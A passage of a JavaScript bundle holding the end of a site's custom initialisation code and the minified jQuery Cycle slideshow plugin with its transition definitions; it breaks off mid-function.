	 			});
	 		}
	 	}	 	
	} //end of cbm
	 	
	/**
	  *  Initialise cbm
	  */
	cbm.init();

};
/*
 * jQuery Cycle Plugin (with Transition Definitions)
 * Examples and documentation at: http://jquery.malsup.com/cycle/
 * Copyright (c) 2007-2010 M. Alsup
 * Version: 2.88 (08-JUN-2010)
 * Dual licensed under the MIT and GPL licenses.
 * http://jquery.malsup.com/license.html
 * Requires: jQuery v1.2.6 or later
 */
(function($){var ver="2.88";if($.support==undefined){$.support={opacity:!($.browser.msie)};}function debug(s){if($.fn.cycle.debug){log(s);}}function log(){if(window.console&&window.console.log){window.console.log("[cycle] "+Array.prototype.join.call(arguments," "));}}$.fn.cycle=function(options,arg2){var o={s:this.selector,c:this.context};if(this.length===0&&options!="stop"){if(!$.isReady&&o.s){log("DOM not ready, queuing slideshow");$(function(){$(o.s,o.c).cycle(options,arg2);});return this;}log("terminating; zero elements found by selector"+($.isReady?"":" (DOM not ready)"));return this;}return this.each(function(){var opts=handleArguments(this,options,arg2);if(opts===false){return;}opts.updateActivePagerLink=opts.updateActivePagerLink||$.fn.cycle.updateActivePagerLink;if(this.cycleTimeout){clearTimeout(this.cycleTimeout);}this.cycleTimeout=this.cyclePause=0;var $cont=$(this);var $slides=opts.slideExpr?$(opts.slideExpr,this):$cont.children();var els=$slides.get();if(els.length<2){log("terminating; too few slides: "+els.length);return;}var opts2=buildOptions($cont,$slides,els,opts,o);if(opts2===false){return;}var startTime=opts2.continuous?10:getTimeout(els[opts2.currSlide],els[opts2.nextSlide],opts2,!opts2.rev);if(startTime){startTime+=(opts2.delay||0);if(startTime<10){startTime=10;}debug("first timeout: "+startTime);this.cycleTimeout=setTimeout(function(){go(els,opts2,0,(!opts2.rev&&!opts.backwards));},startTime);}});};function handleArguments(cont,options,arg2){if(cont.cycleStop==undefined){cont.cycleStop=0;}if(options===undefined||options===null){options={};}if(options.constructor==String){switch(options){case"destroy":case"stop":var opts=$(cont).data("cycle.opts");if(!opts){return false;}cont.cycleStop++;if(cont.cycleTimeout){clearTimeout(cont.cycleTimeout);}cont.cycleTimeout=0;$(cont).removeData("cycle.opts");if(options=="destroy"){destroy(opts);}return false;case"toggle":cont.cyclePause=(cont.cyclePause===1)?0:1;checkInstantResume(cont.cyclePause,arg2,cont);return false;case"pause":cont.cyclePause=1;return false;case"resume":cont.cyclePause=0;checkInstantResume(false,arg2,cont);return false;case"prev":case"next":var opts=$(cont).data("cycle.opts");if(!opts){log('options not found, "prev/next" ignored');return false;}$.fn.cycle[options](opts);return false;default:options={fx:options};}return options;}else{if(options.constructor==Number){var num=options;options=$(cont).data("cycle.opts");if(!options){log("options not found, can not advance slide");return false;}if(num<0||num>=options.elements.length){log("invalid slide index: "+num);return false;}options.nextSlide=num;if(cont.cycleTimeout){clearTimeout(cont.cycleTimeout);cont.cycleTimeout=0;}if(typeof arg2=="string"){options.oneTimeFx=arg2;}go(options.elements,options,1,num>=options.currSlide);return false;}}return options;function checkInstantResume(isPaused,arg2,cont){if(!isPaused&&arg2===true){var options=$(cont).data("cycle.opts");if(!options){log("options not found, can not resume");return false;}if(cont.cycleTimeout){clearTimeout(cont.cycleTimeout);cont.cycleTimeout=0;}go(options.elements,options,1,(!opts.rev&&!opts.backwards));}}}function removeFilter(el,opts){if(!$.support.opacity&&opts.cleartype&&el.style.filter){try{el.style.removeAttribute("filter");}catch(smother){}}}function destroy(opts){if(opts.next){$(opts.next).unbind(opts.prevNextEvent);}if(opts.prev){$(opts.prev).unbind(opts.prevNextEvent);}if(opts.pager||opts.pagerAnchorBuilder){$.each(opts.pagerAnchors||[],function(){this.unbind().remove();});}opts.pagerAnchors=null;if(opts.destroy){opts.destroy(opts);}}function buildOptions($cont,$slides,els,options,o){var opts=$.extend({},$.fn.cycle.defaults,options||{},$.metadata?$cont.metadata():$.meta?$cont.data():{});if(opts.autostop){opts.countdown=opts.autostopCount||els.length;}var cont=$cont[0];$cont.data("cycle.opts",opts);opts.$cont=$cont;opts.stopCount=cont.cycleStop;opts.elements=els;opts.before=opts.before?[opts.before]:[];opts.after=opts.after?[opts.after]:[];opts.after.unshift(function(){opts.busy=0;});if(!$.support.opacity&&opts.cleartype){opts.after.push(function(){removeFilter(this,opts);});}if(opts.continuous){opts.after.push(function(){go(els,opts,0,(!opts.rev&&!opts.backwards));});}saveOriginalOpts(opts);if(!$.support.opacity&&opts.cleartype&&!opts.cleartypeNoBg){clearTypeFix($slides);}if($cont.css("position")=="static"){$cont.css("position","relative");}if(opts.width){$cont.width(opts.width);}if(opts.height&&opts.height!="auto"){$cont.height(opts.height);}if(opts.startingSlide){opts.startingSlide=parseInt(opts.startingSlide);}else{if(opts.backwards){opts.startingSlide=els.length-1;}}if(opts.random){opts.randomMap=[];for(var i=0;i<els.length;i++){opts.randomMap.push(i);}opts.randomMap.sort(function(a,b){return Math.random()-0.5;});opts.randomIndex=1;opts.startingSlide=opts.randomMap[1];}else{if(opts.startingSlide>=els.length){opts.startingSlide=0;}}opts.currSlide=opts.startingSlide||0;var first=opts.startingSlide;$slides.css({position:"absolute",top:0,left:0}).hide().each(function(i){var z;if(opts.backwards){z=first?i<=first?els.length+(i-first):first-i:els.length-i;}else{z=first?i>=first?els.length-(i-first):first-i:els.length-i;}$(this).css("z-index",z);});$(els[first]).css("opacity",1).show();removeFilter(els[first],opts);if(opts.fit&&opts.width){$slides.width(opts.width);}if(opts.fit&&opts.height&&opts.height!="auto"){$slides.height(opts.height);}var reshape=opts.containerResize&&!$cont.innerHeight();if(reshape){var maxw=0,maxh=0;for(var j=0;j<els.length;j++){var $e=$(els[j]),e=$e[0],w=$e.outerWidth(),h=$e.outerHeight();if(!w){w=e.offsetWidth||e.width||$e.attr("width");}if(!h){h=e.offsetHeight||e.height||$e.attr("height");}maxw=w>maxw?w:maxw;maxh=h>maxh?h:maxh;}if(maxw>0&&maxh>0){$cont.css({width:maxw+"px",height:maxh+"px"});}}if(opts.pause){$cont.hover(function(){this.cyclePause++;},function(){this.cyclePause--;});}if(supportMultiTransitions(opts)===false){return false;}var requeue=false;options.requeueAttempts=options.requeueAttempts||0;$slides.each(function(){var $el=$(this);this.cycleH=(opts.fit&&opts.height)?opts.height:($el.height()||this.offsetHeight||this.height||$el.attr("height")||0);this.cycleW=(opts.fit&&opts.width)?opts.width:($el.width()||this.offsetWidth||this.width||$el.attr("width")||0);if($el.is("img")){var loadingIE=($.browser.msie&&this.cycleW==28&&this.cycleH==30&&!this.complete);var loadingFF=($.browser.mozilla&&this.cycleW==34&&this.cycleH==19&&!this.complete);var loadingOp=($.browser.opera&&((this.cycleW==42&&this.cycleH==19)||(this.cycleW==37&&this.cycleH==17))&&!this.complete);var loadingOther=(this.cycleH==0&&this.cycleW==0&&!this.complete);if(loadingIE||loadingFF||loadingOp||loadingOther){if(o.s&&opts.requeueOnImageNotLoaded&&++options.requeueAttempts<100){log(options.requeueAttempts," - img slide not loaded, requeuing slideshow: ",this.src,this.cycleW,this.cycleH);setTimeout(function(){$(o.s,o.c).cycle(options);},opts.requeueTimeout);requeue=true;return false;}else{log("could not determine size of image: "+this.src,this.cycleW,this.cycleH);}}}return true;});if(requeue){return false;}opts.cssBefore=opts.cssBefore||{};opts.animIn=opts.animIn||{};opts.animOut=opts.animOut||{};$slides.not(":eq("+first+")").css(opts.cssBefore);if(opts.cssFirst){$($slides[first]).css(opts.cssFirst);}if(opts.timeout){opts.timeout=parseInt(opts.timeout);if(opts.speed.constructor==String){opts.speed=$.fx.speeds[opts.speed]||parseInt(opts.speed);}if(!opts.sync){opts.speed=opts.speed/2;}var buffer=opts.fx=="shuffle"?500:250;while((opts.timeout-opts.speed)<buffer){opts.timeout+=opts.speed;}}if(opts.easing){opts.easeIn=opts.easeOut=opts.easing;}if(!opts.speedIn){opts.speedIn=opts.speed;}if(!opts.speedOut){opts.speedOut=opts.speed;}opts.slideCount=els.length;opts.currSlide=opts.lastSlide=first;if(opts.random){if(++opts.randomIndex==els.length){opts.randomIndex=0;}opts.nextSlide=opts.randomMap[opts.randomIndex];}else{if(opts.backwards){opts.nextSlide=opts.startingSlide==0?(els.length-1):opts.startingSlide-1;}else{opts.nextSlide=opts.startingSlide>=(els.length-1)?0:opts.startingSlide+1;}}if(!opts.multiFx){var init=$.fn.cycle.transitions[opts.fx];if($.isFunction(init)){init($cont,$slides,opts);}else{if(opts.fx!="custom"&&!opts.multiFx){log("unknown transition: "+opts.fx,"; slideshow terminating");return false;}}}var e0=$slides[first];if(opts.before.length){opts.before[0].apply(e0,[e0,e0,opts,true]);}if(opts.after.length>1){opts.after[1].apply(e0,[e0,e0,opts,true]);}if(opts.next){$(opts.next).bind(opts.prevNextEvent,function(){return advance(opts,opts.rev?-1:1);});}if(opts.prev){$(opts.prev).bind(opts.prevNextEvent,function(){return advance(opts,opts.rev?1:-1);});}if(opts.pager||opts.pagerAnchorBuilder){buildPager(els,opts);}exposeAddSlide(opts,els);return opts;}function saveOriginalOpts(opts){opts.original={before:[],after:[]};opts.original.cssBefore=$.extend({},opts.cssBefore);opts.original.cssAfter=$.extend({},opts.cssAfter);opts.original.animIn=$.extend({},opts.animIn);opts.original.animOut=$.extend({},opts.animOut);$.each(opts.before,function(){opts.original.before.push(this);});$.each(opts.after,function(){opts.original.after.push(this);});}function supportMultiTransitions(opts){var i,tx,txs=$.fn.cycle.transitions;if(opts.fx.indexOf(",")>0){opts.multiFx=true;opts.fxs=opts.fx.replace(/\s*/g,"").split(",");for(i=0;i<opts.fxs.length;i++){var fx=opts.fxs[i];tx=txs[fx];if(!tx||!txs.hasOwnProperty(fx)||!$.isFunction(tx)){log("discarding unknown transition: ",fx);opts.fxs.splice(i,1);i--;}}if(!opts.fxs.length){log("No valid transitions named; slideshow terminating.");return false;}}else{if(opts.fx=="all"){opts.multiFx=true;opts.fxs=[];for(p in txs){tx=txs[p];if(txs.hasOwnProperty(p)&&$.isFunction(tx)){opts.fxs.push(p);}}}}if(opts.multiFx&&opts.randomizeEffects){var r1=Math.floor(Math.random()*20)+30;for(i=0;i<r1;i++){var r2=Math.floor(Math.random()*opts.fxs.length);opts.fxs.push(opts.fxs.splice(r2,1)[0]);}debug("randomized fx sequence: ",opts.fxs);}return true;}function exposeAddSlide(opts,els){opts.addSlide=function(newSlide,prepend){var $s=$(newSlide),s=$s[0];if(!opts.autostopCount){opts.countdown++;}els[prepend?"unshift":"push"](s);if(opts.els){opts.els[prepend?"unshift":"push"](s);}opts.slideCount=els.length;$s.css("position","absolute");$s[prepend?"prependTo":"appendTo"](opts.$cont);if(prepend){opts.currSlide++;opts.nextSlide++;}if(!$.support.opacity&&opts.cleartype&&!opts.cleartypeNoBg){clearTypeFix($s);}if(opts.fit&&opts.width){$s.width(opts.width);}if(opts.fit&&opts.height&&opts.height!="auto"){$slides.height(opts.height);}s.cycleH=(opts.fit&&opts.height)?opts.height:$s.height();s.cycleW=(opts.fit&&opts.width)?opts.width:$s.width();$s.css(opts.cssBefore);if(opts.pager||opts.pagerAnchorBuilder){$.fn.cycle.createPagerAnchor(els.length-1,s,$(opts.pager),els,opts);}if($.isFunction(opts.onAddSlide)){opts.onAddSlide($s);}else{$s.hide();}};}$.fn.cycle.resetState=function(opts,fx){fx=fx||opts.fx;opts.before=[];opts.after=[];opts.cssBefore=$.extend({},opts.original.cssBefore);opts.cssAfter=$.extend({},opts.original.cssAfter);opts.animIn=$.extend({},opts.original.animIn);opts.animOut=$.extend({},opts.original.animOut);opts.fxFn=null;$.each(opts.original.before,function(){opts.before.push(this);});$.each(opts.original.after,function(){opts.after.push(this);});var init=$.fn.cycle.transitions[fx];if($.isFunction(init)){init(opts.$cont,$(opts.elements),opts);}};function go(els,opts,manual,fwd){if(manual&&opts.busy&&opts.manualTrump){debug("manualTrump in go(), stopping active transition");$(els).stop(true,true);opts.busy=false;}if(opts.busy){debug("transition active, ignoring new tx request");return;}var p=opts.$cont[0],curr=els[opts.currSlide],next=els[opts.nextSlide];if(p.cycleStop!=opts.stopCount||p.cycleTimeout===0&&!manual){return;}if(!manual&&!p.cyclePause&&!opts.bounce&&((opts.autostop&&(--opts.countdown<=0))||(opts.nowrap&&!opts.random&&opts.nextSlide<opts.currSlide))){if(opts.end){opts.end(opts);}return;}var changed=false;if((manual||!p.cyclePause)&&(opts.nextSlide!=opts.currSlide)){changed=true;var fx=opts.fx;curr.cycleH=curr.cycleH||$(curr).height();curr.cycleW=curr.cycleW||$(curr).width();next.cycleH=next.cycleH||$(next).height();next.cycleW=next.cycleW||$(next).width();if(opts.multiFx){if(opts.lastFx==undefined||++opts.lastFx>=opts.fxs.length){opts.lastFx=0;}fx=opts.fxs[opts.lastFx];opts.currFx=fx;}if(opts.oneTimeFx){fx=opts.oneTimeFx;opts.oneTimeFx=null;}$.fn.cycle.resetState(opts,fx);if(opts.before.length){$.each(opts.before,function(i,o){if(p.cycleStop!=opts.stopCount){return;}o.apply(next,[curr,next,opts,fwd]);});}var after=function(){$.each(opts.after,function(i,o){if(p.cycleStop!=opts.stopCount){return;}o.apply(next,[curr,next,opts,fwd]);});};debug("tx firing; currSlide: "+opts.currSlide+"; nextSlide: "+opts.nextSlide);opts.busy=1;if(opts.fxFn){opts.fxFn(curr,next,opts,after,fwd,manual&&opts.fastOnEvent);}else{if($.isFunction($.fn.cycle[opts.fx])){$.fn.cycle[opts.fx](curr,next,opts,after,fwd,manual&&opts.fastOnEvent);}else{$.fn.cycle.custom(curr,next,opts,after,fwd,manual&&opts.fastOnEvent);}}}if(changed||opts.nextSlide==opts.currSlide){opts.lastSlide=opts.currSlide;if(opts.random){opts.currSlide=opts.nextSlide;if(++opts.randomIndex==els.length){opts.randomIndex=0;}opts.nextSlide=opts.randomMap[opts.randomIndex];if(opts.nextSlide==opts.currSlide){opts.nextSlide=(opts.currSlide==opts.slideCount-1)?0:opts.currSlide+1;}}else{if(opts.backwards){var roll=(opts.nextSlide-1)<0;if(roll&&opts.bounce){opts.backwards=!opts.backwards;opts.nextSlide=1;opts.currSlide=0;}else{opts.nextSlide=roll?(els.length-1):opts.nextSlide-1;opts.currSlide=roll?0:opts.nextSlide+1;}}else{var roll=(opts.nextSlide+1)==els.length;if(roll&&opts.bounce){opts.backwards=!opts.backwards;opts.nextSlide=els.length-2;opts.currSlide=els.length-1;}else{opts.nextSlide=roll?0:opts.nextSlide+1;opts.currSlide=roll?els.length-1:opts.nextSlide-1;}}}}if(changed&&opts.pager){opts.updateActivePagerLink(opts.pager,opts.currSlide,opts.activePagerClass);}var ms=0;if(opts.timeout&&!opts.continuous){ms=getTimeout(els[opts.currSlide],els[opts.nextSlide],opts,fwd);}else{if(opts.continuous&&p.cyclePause){ms=10;}}if(ms>0){p.cycleTimeout=setTimeout(function(){go(els,opts,0,(!opts.rev&&!opts.backwards));},ms);}}$.fn.cycle.updateActivePagerLink=function(pager,currSlide,clsName){$(pager).each(function(){$(this).children().removeClass(clsName).eq(currSlide).addClass(clsName);});};function getTimeout(curr,next,opts,fwd){if(opts.timeoutFn){var t=opts.timeoutFn.call(curr,curr,next,opts,fwd);while((t-opts.speed)<250){t+=opts.speed;}debug("calculated timeout: "+t+"; speed: "+opts.speed);if(t!==false){return t;}}return opts.timeout;}$.fn.cycle.next=function(opts){advance(opts,opts.rev?-1:1);};$.fn.cycle.prev=function(opts){advance(opts,opts.rev?1:-1);};function advance(opts,val){var els=opts.elements;var p=opts.$cont[0],timeout=p.cycleTimeout;if(timeout){clearTimeout(timeout);p.cycleTimeout=0;}if(opts.random&&val<0){opts.randomIndex--;if(--opts.randomIndex==-2){opts.randomIndex=els.length-2;}else{if(opts.randomIndex==-1){opts.randomIndex=els.length-1;}}opts.nextSlide=opts.randomMap[opts.randomIndex];}else{if(opts.random){opts.nextSlide=opts.randomMap[opts.randomIndex];}else{opts.nextSlide=opts.currSlide+val;if(opts.nextSlide<0){if(opts.nowrap){return false;}opts.nextSlide=els.length-1;}else{if(opts.nextSlide>=els.length){if(opts.nowrap){return false;}opts.nextSlide=0;}}}}var cb=opts.onPrevNextEvent||opts.prevNextClick;if($.isFunction(cb)){cb(val>0,opts.nextSlide,els[opts.nextSlide]);}go(els,opts,1,val>=0);return false;}function buildPager(els,opts){var $p=$(opts.pager);$.each(els,function(i,o){$.fn.cycle.createPagerAnchor(i,o,$p,els,opts);});opts.updateActivePagerLink(opts.pager,opts.startingSlide,opts.activePagerClass);}$.fn.cycle.createPagerAnchor=function(i,el,$p,els,opts){var a;if($.isFunction(opts.pagerAnchorBuilder)){a=opts.pagerAnchorBuilder(i,el);debug("pagerAnchorBuilder("+i+", el) returned: "+a);}else{a='<a href="#">'+(i+1)+"</a>";}if(!a){return;}var $a=$(a);if($a.parents("body").length===0){var arr=[];if($p.length>1){$p.each(function(){var $clone=$a.clone(true);$(this).append($clone);arr.push($clone[0]);});$a=$(arr);}else{$a.appendTo($p);}}opts.pagerAnchors=opts.pagerAnchors||[];opts.pagerAnchors.push($a);$a.bind(opts.pagerEvent,function(e){e.preventDefault();opts.nextSlide=i;var p=opts.$cont[0],timeout=p.cycleTimeout;if(timeout){clearTimeout(timeout);p.cycleTimeout=0;}var cb=opts.onPagerEvent||opts.pagerClick;if($.isFunction(cb)){cb(opts.nextSlide,els[opts.nextSlide]);}go(els,opts,1,opts.currSlide<i);});if(!/^click/.test(opts.pagerEvent)&&!opts.allowPagerClickBubble){$a.bind("click.cycle",function(){return false;});}if(opts.pauseOnPagerHover){$a.hover(function(){opts.$cont[0].cyclePause++;},function(){opts.$cont[0].cyclePause--;});}};$.fn.cycle.hopsFromLast=function(opts,fwd){var hops,l=opts.lastSlide,c=opts.currSlide;if(fwd){hops=c>l?c-l:opts.slideCount-l;}else{hops=c<l?l-c:l+opts.slideCount-c;}return hops;};function clearTypeFix($slides){debug("applying clearType background-color hack");function hex(s){s=parseInt(s).toString(16);return s.length<2?"0"+s:s;}function getBg(e){for(;e&&e.nodeName.toLowerCase()!="html";e=e.parentNode){var v=$.css(e,"background-color");if(v.indexOf("rgb")>=0){var rgb=v.match(/\d+/g);return"#"+hex(rgb[0])+hex(rgb[1])+hex(rgb[2]);}if(v&&v!="transparent"){return v;}}return"#ffffff";}$slides.each(function(){$(this).css("background-color",getBg(this));});}$.fn.cycle.commonReset=function(curr,next,opts,w,h,rev){$(opts.elements).not(curr).hide();opts.cssBefore.opacity=1;opts.cssBefore.display="block";if(w!==false&&next.cycleW>0){opts.cssBefore.width=next.cycleW;}if(h!==false&&next.cycleH>0){opts.cssBefore.height=next.cycleH;}opts.cssAfter=opts.cssAfter||{};opts.cssAfter.display="none";$(curr).css("zIndex",opts.slideCount+(rev===true?1:0));$(next).css("zIndex",opts.slideCount+(rev===true?0:1));};$.fn.cycle.custom=function(curr,next,opts,cb,fwd,speedOverride){var $l=$(curr),$n=$(next);var speedIn=opts.speedIn,speedOut=opts.speedOut,easeIn=opts.easeIn,easeOut=opts.easeOut;$n.css(opts.cssBefore);if(speedOverride){if(typeof speedOverride=="number"){speedIn=speedOut=speedOverride;}else{speedIn=speedOut=1;}easeIn=easeOut=null;}var fn=function(){$n.animate(opts.animIn,speedIn,easeIn,cb);};$l.animate(opts.animOut,speedOut,easeOut,function(){if(opts.cssAfter){$l.css(opts.cssAfter);}if(!opts.sync){fn();}});if(opts.sync){fn();}};$.fn.cycle.transitions={fade:function($cont,$slides,opts){$slides.not(":eq("+opts.currSlide+")").css("opacity",0);opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts);opts.cssBefore.opacity=0;});opts.animIn={opacity:1};opts.animOut={opacity:0};opts.cssBefore={top:0,left:0};}};$.fn.cycle.ver=function(){return ver;};$.fn.cycle.defaults={fx:"fade",timeout:4000,timeoutFn:null,continuous:0,speed:1000,speedIn:null,speedOut:null,next:null,prev:null,onPrevNextEvent:null,prevNextEvent:"click.cycle",pager:null,onPagerEvent:null,pagerEvent:"click.cycle",allowPagerClickBubble:false,pagerAnchorBuilder:null,before:null,after:null,end:null,easing:null,easeIn:null,easeOut:null,shuffle:null,animIn:null,animOut:null,cssBefore:null,cssAfter:null,fxFn:null,height:"auto",startingSlide:0,sync:1,random:0,fit:0,containerResize:1,pause:0,pauseOnPagerHover:0,autostop:0,autostopCount:0,delay:0,slideExpr:null,cleartype:!$.support.opacity,cleartypeNoBg:false,nowrap:0,fastOnEvent:0,randomizeEffects:1,rev:0,manualTrump:true,requeueOnImageNotLoaded:true,requeueTimeout:250,activePagerClass:"activeSlide",updateActivePagerLink:null,backwards:false};})(jQuery);
/*
 * jQuery Cycle Plugin Transition Definitions
 * This script is a plugin for the jQuery Cycle Plugin
 * Examples and documentation at: http://malsup.com/jquery/cycle/
 * Copyright (c) 2007-2010 M. Alsup
 * Version:	 2.72
 * Dual licensed under the MIT and GPL licenses:
 * http://www.opensource.org/licenses/mit-license.php
 * http://www.gnu.org/licenses/gpl.html
 */
(function($){$.fn.cycle.transitions.none=function($cont,$slides,opts){opts.fxFn=function(curr,next,opts,after){$(next).show();$(curr).hide();after();};};$.fn.cycle.transitions.scrollUp=function($cont,$slides,opts){$cont.css("overflow","hidden");opts.before.push($.fn.cycle.commonReset);var h=$cont.height();opts.cssBefore={top:h,left:0};opts.cssFirst={top:0};opts.animIn={top:0};opts.animOut={top:-h};};$.fn.cycle.transitions.scrollDown=function($cont,$slides,opts){$cont.css("overflow","hidden");opts.before.push($.fn.cycle.commonReset);var h=$cont.height();opts.cssFirst={top:0};opts.cssBefore={top:-h,left:0};opts.animIn={top:0};opts.animOut={top:h};};$.fn.cycle.transitions.scrollLeft=function($cont,$slides,opts){$cont.css("overflow","hidden");opts.before.push($.fn.cycle.commonReset);var w=$cont.width();opts.cssFirst={left:0};opts.cssBefore={left:w,top:0};opts.animIn={left:0};opts.animOut={left:0-w};};$.fn.cycle.transitions.scrollRight=function($cont,$slides,opts){$cont.css("overflow","hidden");opts.before.push($.fn.cycle.commonReset);var w=$cont.width();opts.cssFirst={left:0};opts.cssBefore={left:-w,top:0};opts.animIn={left:0};opts.animOut={left:w};};$.fn.cycle.transitions.scrollHorz=function($cont,$slides,opts){$cont.css("overflow","hidden").width();opts.before.push(function(curr,next,opts,fwd){$.fn.cycle.commonReset(curr,next,opts);opts.cssBefore.left=fwd?(next.cycleW-1):(1-next.cycleW);opts.animOut.left=fwd?-curr.cycleW:curr.cycleW;});opts.cssFirst={left:0};opts.cssBefore={top:0};opts.animIn={left:0};opts.animOut={top:0};};$.fn.cycle.transitions.scrollVert=function($cont,$slides,opts){$cont.css("overflow","hidden");opts.before.push(function(curr,next,opts,fwd){$.fn.cycle.commonReset(curr,next,opts);opts.cssBefore.top=fwd?(1-next.cycleH):(next.cycleH-1);opts.animOut.top=fwd?curr.cycleH:-curr.cycleH;});opts.cssFirst={top:0};opts.cssBefore={left:0};opts.animIn={top:0};opts.animOut={left:0};};$.fn.cycle.transitions.slideX=function($cont,$slides,opts){opts.before.push(function(curr,next,opts){$(opts.elements).not(curr).hide();$.fn.cycle.commonReset(curr,next,opts,false,true);opts.animIn.width=next.cycleW;});opts.cssBefore={left:0,top:0,width:0};opts.animIn={width:"show"};opts.animOut={width:0};};$.fn.cycle.transitions.slideY=function($cont,$slides,opts){opts.before.push(function(curr,next,opts){$(opts.elements).not(curr).hide();$.fn.cycle.commonReset(curr,next,opts,true,false);opts.animIn.height=next.cycleH;});opts.cssBefore={left:0,top:0,height:0};opts.animIn={height:"show"};opts.animOut={height:0};};$.fn.cycle.transitions.shuffle=function($cont,$slides,opts){var i,w=$cont.css("overflow","visible").width();$slides.css({left:0,top:0});opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts,true,true,true);});if(!opts.speedAdjusted){opts.speed=opts.speed/2;opts.speedAdjusted=true;}opts.random=0;opts.shuffle=opts.shuffle||{left:-w,top:15};opts.els=[];for(i=0;i<$slides.length;i++){opts.els.push($slides[i]);}for(i=0;i<opts.currSlide;i++){opts.els.push(opts.els.shift());}opts.fxFn=function(curr,next,opts,cb,fwd){var $el=fwd?$(curr):$(next);$(next).css(opts.cssBefore);var count=opts.slideCount;$el.animate(opts.shuffle,opts.speedIn,opts.easeIn,function(){var hops=$.fn.cycle.hopsFromLast(opts,fwd);for(var k=0;k<hops;k++){fwd?opts.els.push(opts.els.shift()):opts.els.unshift(opts.els.pop());}if(fwd){for(var i=0,len=opts.els.length;i<len;i++){$(opts.els[i]).css("z-index",len-i+count);}}else{var z=$(curr).css("z-index");$el.css("z-index",parseInt(z)+1+count);}$el.animate({left:0,top:0},opts.speedOut,opts.easeOut,function(){$(fwd?this:curr).hide();if(cb){cb();}});});};opts.cssBefore={display:"block",opacity:1,top:0,left:0};};$.fn.cycle.transitions.turnUp=function($cont,$slides,opts){opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts,true,false);opts.cssBefore.top=next.cycleH;opts.animIn.height=next.cycleH;});opts.cssFirst={top:0};opts.cssBefore={left:0,height:0};opts.animIn={top:0};opts.animOut={height:0};};$.fn.cycle.transitions.turnDown=function($cont,$slides,opts){opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts,true,false);opts.animIn.height=next.cycleH;opts.animOut.top=curr.cycleH;});opts.cssFirst={top:0};opts.cssBefore={left:0,top:0,height:0};opts.animOut={height:0};};$.fn.cycle.transitions.turnLeft=function($cont,$slides,opts){opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts,false,true);opts.cssBefore.left=next.cycleW;opts.animIn.width=next.cycleW;});opts.cssBefore={top:0,width:0};opts.animIn={left:0};opts.animOut={width:0};};$.fn.cycle.transitions.turnRight=function($cont,$slides,opts){opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts,false,true);opts.animIn.width=next.cycleW;opts.animOut.left=curr.cycleW;});opts.cssBefore={top:0,left:0,width:0};opts.animIn={left:0};opts.animOut={width:0};};$.fn.cycle.transitions.zoom=function($cont,$slides,opts){opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts,false,false,true);opts.cssBefore.top=next.cycleH/2;opts.cssBefore.left=next.cycleW/2;opts.animIn={top:0,left:0,width:next.cycleW,height:next.cycleH};opts.animOut={width:0,height:0,top:curr.cycleH/2,left:curr.cycleW/2};});opts.cssFirst={top:0,left:0};opts.cssBefore={width:0,height:0};};$.fn.cycle.transitions.fadeZoom=function($cont,$slides,opts){opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts,false,false);opts.cssBefore.left=next.cycleW/2;opts.cssBefore.top=next.cycleH/2;opts.animIn={top:0,left:0,width:next.cycleW,height:next.cycleH};});opts.cssBefore={width:0,height:0};opts.animOut={opacity:0};};$.fn.cycle.transitions.blindX=function($cont,$slides,opts){var w=$cont.css("overflow","hidden").width();opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts);opts.animIn.width=next.cycleW;opts.animOut.left=curr.cycleW;});opts.cssBefore={left:w,top:0};opts.animIn={left:0};opts.animOut={left:w};};$.fn.cycle.transitions.blindY=function($cont,$slides,opts){var h=$cont.css("overflow","hidden").height();opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts);opts.animIn.height=next.cycleH;opts.animOut.top=curr.cycleH;});opts.cssBefore={top:h,left:0};opts.animIn={top:0};opts.animOut={top:h};};$.fn.cycle.transitions.blindZ=function($cont,$slides,opts){var h=$cont.css("overflow","hidden").height();var w=$cont.width();opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts);opts.animIn.height=next.cycleH;opts.animOut.top=curr.cycleH;});opts.cssBefore={top:h,left:w};opts.animIn={top:0,left:0};opts.animOut={top:h,left:w};};$.fn.cycle.transitions.growX=function($cont,$slides,opts){opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts,false,true);opts.cssBefore.left=this.cycleW/2;opts.animIn={left:0,width:this.cycleW};opts.animOut={left:0};});opts.cssBefore={width:0,top:0};};$.fn.cycle.transitions.growY=function($cont,$slides,opts){opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts,true,false);opts.cssBefore.top=this.cycleH/2;opts.animIn={top:0,height:this.cycleH};opts.animOut={top:0};});opts.cssBefore={height:0,left:0};};$.fn.cycle.transitions.curtainX=function($cont,$slides,opts){opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts,false,true,true);opts.cssBefore.left=next.cycleW/2;opts.animIn={left:0,width:this.cycleW};opts.animOut={left:curr.cycleW/2,width:0};});opts.cssBefore={top:0,width:0};};$.fn.cycle.transitions.curtainY=function($cont,$slides,opts){opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts,true,false,true);opts.cssBefore.top=next.cycleH/2;opts.animIn={top:0,height:next.cycleH};opts.animOut={top:curr.cycleH/2,height:0};});opts.cssBefore={left:0,height:0};};$.fn.cycle.transitions.cover=function($cont,$slides,opts){var d=opts.direction||"left";var w=$cont.css("overflow","hidden").width();var h=$cont.height();opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts);if(d=="right"){opts.cssBefore.left=-w;}else{if(d=="up"){opts.cssBefore.top=h;}else{if(d=="down"){opts.cssBefore.top=-h;}else{opts.cssBefore.left=w;}}}});opts.animIn={left:0,top:0};opts.animOut={opacity:1};opts.cssBefore={top:0,left:0};};$.fn.cycle.transitions.uncover=function($cont,$slides,opts){var d=opts.direction||"left";var w=$cont.css("overflow","hidden").width();var 